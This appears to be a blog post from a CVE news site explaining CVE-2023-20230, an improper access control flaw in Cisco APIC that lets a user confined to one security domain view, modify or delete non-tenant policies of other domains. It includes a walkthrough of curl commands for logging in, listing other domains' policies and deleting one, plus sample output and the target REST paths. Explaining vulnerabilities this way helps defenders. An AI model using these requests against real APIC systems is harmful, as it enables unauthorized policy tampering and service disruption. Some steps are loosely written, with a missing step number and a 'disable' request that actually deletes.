CVE CyberSecurity Database News

CVE-2023-20230 - Breaking Cisco APIC’s Security Barriers – How Improper Access Control Lets Attackers Jump Security Domains

Poster -

Modern data centers rely on robust separation between tenants and security groups to protect sensitive data and operations. Cisco Application Policy Infrastructure Controller (APIC) is a popular solution for managing application policies in enterprise networks. However, CVE-2023-20230 exposes a serious flaw in APIC’s implementation of restricted security domains. An attacker with valid credentials — but limited access — can cross security boundaries and tamper with policies belonging to other groups.

Let’s break down this vulnerability, explore how it works, see code examples of exploitation, and point to original advisories. No previous deep security experience required!

What Is CVE-2023-20230?

CVE-2023-20230 is a security vulnerability in Cisco APIC that allows an authenticated, remote attacker to read, modify, or delete policies (like network access controls) belonging to users from a different security domain.

*In plain terms:*
If you’re a legit APIC user, but your account is fenced into a restricted “security domain,” you still might be able to mess with someone else’s rules right through the web interface or the APIC REST API — if those rules aren’t strictly under a “tenant” you’re blocked from.

What Went Wrong? (Technical Deep Dive)

The root of the problem is improper access control. APIC is supposed to partition “multi-tenant” policies, but it fails to restrict actions on *non-tenant* policies (such as access policies) when security domains are in use.

Security Domains are supposed to provide logical separation within or across tenants.

The bug allows any user with access to *any* restricted domain to access, change, or delete non-tenant policies created by others—even if those users are assigned to a different (and supposedly inaccessible) domain.

The policies they attack must NOT be under a tenant they don’t have access to.

> Critical note: Attacks can't cross into real tenant boundaries unless the attacker already has legit access there.

Exploiting the Vulnerability: An Example Walkthrough

Triggering this bug is easier than you might expect if you have the right (mis)configuration.

1. Attacker Logs In

Suppose the attacker, alice, is assigned to SecurityDomainA (and *shouldn’t* see SecurityDomainB):

curl -k -X POST 'https://apic.example.com/api/aaaLogin.json'; -d '{"aaaUser": {"attributes": {"name": "alice", "pwd": "alicePassword"}}}'

2. List All Non-Tenant Policies

Even though alice should only see policies in SecurityDomainA, she can list *all* non-tenant policies if she knows the REST path:

curl -k -H 'Cookie: APIC-cookie=alice-session-token' 'https://apic.example.com/api/node/class/fvAEPg.json';

Sample Output

{
  "totalCount": "2",
  "imdata": [
    { "fvAEPg": { "attributes": { "name": "AccessGroup_42", "securityDomain": "SecurityDomainB" } } },
    { "fvAEPg": { "attributes": { "name": "AccessGroup_Alpha", "securityDomain": "SecurityDomainA" } } }
  ]
}

Notice: alice just viewed SecurityDomainB’s policy, when she shouldn’t.

Let’s say alice wants to *disable* AccessGroup_42 (which belongs to SecurityDomainB)

curl -k -X POST -H 'Cookie: APIC-cookie=alice-session-token' \
  -d '{"fvAEPg": {"attributes": {"status": "deleted"}}}' \
  'https://apic.example.com/api/mo/uni/tn-Common/ap-AccessGroup_42.json';

4. Delete Another Domain’s Policy

Similarly, sending an API request with status: deleted will remove the policy—without needing permission.

Visual Reference: REST API Paths

/api/node/class/fvAEPg.json                  # Policy list
/api/mo/uni/tn-Common/ap-<POLICY>.json       # Modify/Delete specific policy

> If you know or can guess the object names, you can brutalize or exfiltrate almost any non-tenant policy!

What Could Go Wrong?

- Unauthorized Policy Changes: Attackers can open, block, or redirect network traffic not belonging to their own domain.
- Service Disruption: By deleting or corrupting crucial access policies, an attacker could take down workloads for other departments or clients.
- Information Leakage: Attackers see restricted information about other security domains, which could be used for targeted attacks.

Mitigation & Recommendations

Cisco’s official advisory:
Cisco Security Advisory for CVE-2023-20230

Conclusion

CVE-2023-20230 is a powerful example of why “trust boundaries” matter. If a system doesn’t enforce them rigorously, even limited users can become inside attackers.

Anyone running a multi-tenant APIC environment should update immediately and keep a sharp eye on user actions across their security domains. Stay alert, and help your organization stay one step ahead of attackers!

Original References

- Cisco Security Advisory (CVE-2023-20230)
- Cisco APIC Documentation
- NIST CVE Record for CVE-2023-20230


*This post is an exclusive overview written in plain American English for clarity. Be responsible and do not use this information for unauthorized activity.*

Timeline

Published on: 08/23/2023 19:15:00 UTC
Last modified on: 08/31/2023 14:59:00 UTC